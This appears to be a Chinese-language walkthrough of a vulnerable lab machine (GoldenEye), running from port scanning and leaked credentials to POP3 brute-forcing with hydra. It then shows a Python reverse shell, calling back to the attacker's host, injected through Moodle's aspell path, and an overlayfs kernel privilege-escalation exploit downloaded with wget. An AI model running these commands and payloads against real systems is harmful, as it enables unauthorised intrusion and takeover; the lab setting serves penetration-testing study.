1.主机发现:arp-scan -l,发现靶机ip为192.168.225.153
2.扫描端口,开启了55007端口为pop3服务
nmap 192.168.225.153 -sV -sC -Pn -n -v -T5 -p-
3.访问网址,查看源代码,发现terminal.js,进行访问发现两个用户名:boris和Natalya
进行unicode解码,获得密码:InvincibleHack3r
4.尝试登录:http://192.168.225.153/sev-home/
5.获得页面提示:在非默认端口,开了pop3服务
在上面,nmap已经扫过了,55007开的pop3端口
6.源码暗示我们登录到这两个用户的邮箱中去,所以首先爆破密码:
hydra -L user.txt -P /usr/share/wordlists/fasttrack.txt 192.168.225.153 -s 55007 pop3
7.nc登录,查看邮箱信息,发现boris里面没有有用信息,所以登录:
nc 192.168.225.153 55007
user Natalya
pass bird
list
retr 2
8.在第二封邮件看到了另外一个用户名密码,此服务器域名和网站,还要求我们在本地hosts中添加域名信息:
邮件信息:
username:xenia
password:RCP90rulez!
域:severnaya-station.com
网址:severnaya-station.com/gnocertdir/
9.添加域名信息:
vi /etc/hosts
10.添加之后,访问网址:severnaya-station.com/gnocertdir
11.在右上角发现要登录,试着用刚刚在邮件中发现的账号和密码进行登录,登进去后,在"My profile"-->"Messages"-->选择"Recent conversations"看到一个名为doak的用户
12.用hydra爆破这个用户的密码:
hydra -l doak -P /usr/share/wordlists/fasttrack.txt 192.168.225.153 -s 55007 pop3
13.同样的方法nc登录改用户邮箱,又发现新的账户密码:
username:dr_doak
password:4England!
用该账号登录:
http://severnaya-station.com/gnocertdir/login/index.php
在"My profile"->"My private files"里面发现了s3cret.txt
14.根据文档提示下载图片:
http://severnaya-station.com/dir007key/for-007.jpg
strings for-007.jpg
杂项思路,发现编码BASE64解密:
eFdpbnRlcjE5OTV4IQ== //xWinter1995x!
15.在未读消息中,发现管理员用户,猜测以上为管理员密码,进行登录:
Site administration->Plugins->Text editors->TinyMCE中Spell engine选项修改为PSpellShell
16.添加反弹Shell代码:
在"Settings"-->"Site administration"-->"Server"-->"System paths"-->"Path to aspell"进行命令执行
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.225.133",8888));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
17.kali上监听端口,通过在home->my profile->blogs->add a new entry中新建文章,随便输入字符,点击"Toggle Spellchecker"之后就会反弹到shell
提权:
18.生成交互式shell:
python -c 'import pty; pty.spawn("/bin/bash")'
12.uname -a查看靶机版本,使用msfconsole查询漏洞并使用
searchsploit ubuntu 3.13
13.由于靶机没有安装gcc,这里使用cc编译,需要修改源码一处代码,将gcc改为cc。
开启http.server服务,将37292.c传至靶机并执行,会生成a.out,对他修改执行权限并执行
python3 -m http.server 80
wget 192.168.225.133/37292.c /tmp
cc 37292.c
chmod 777 a.out
ls -al
14.总结
1.js信息泄露
2.hydra爆破pop3服务
3.登陆pop3服务(nc,list,retr)
4.moodle平台
5.拼写检查getshell
6.Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04)-'overlayfs' Local Privilege Escalation提权
扩展:
该网站的cms是Moodle的2.2.3版本,该版本存在远程命令执行的漏洞:
Moodle允许经过身份验证的用户通过web界面定义拼写检查设置。用户可以更新拼写检查机制以指向安装了二进制文件的系统。通过将拼写检查器的路径更新为任意命令,攻击者可以运行拼写检查请求时web应用程序上下文中的任意命令。
此模块还允许攻击者利用另一个权限提升漏洞。使用引用的XSS vuln,一个未经授权的身份验证用户可以窃取一个管理员sesskey并使用它将权限升级为管理员权限,从而允许模块弹出一个shell作为以前未经授权的身份验证用户。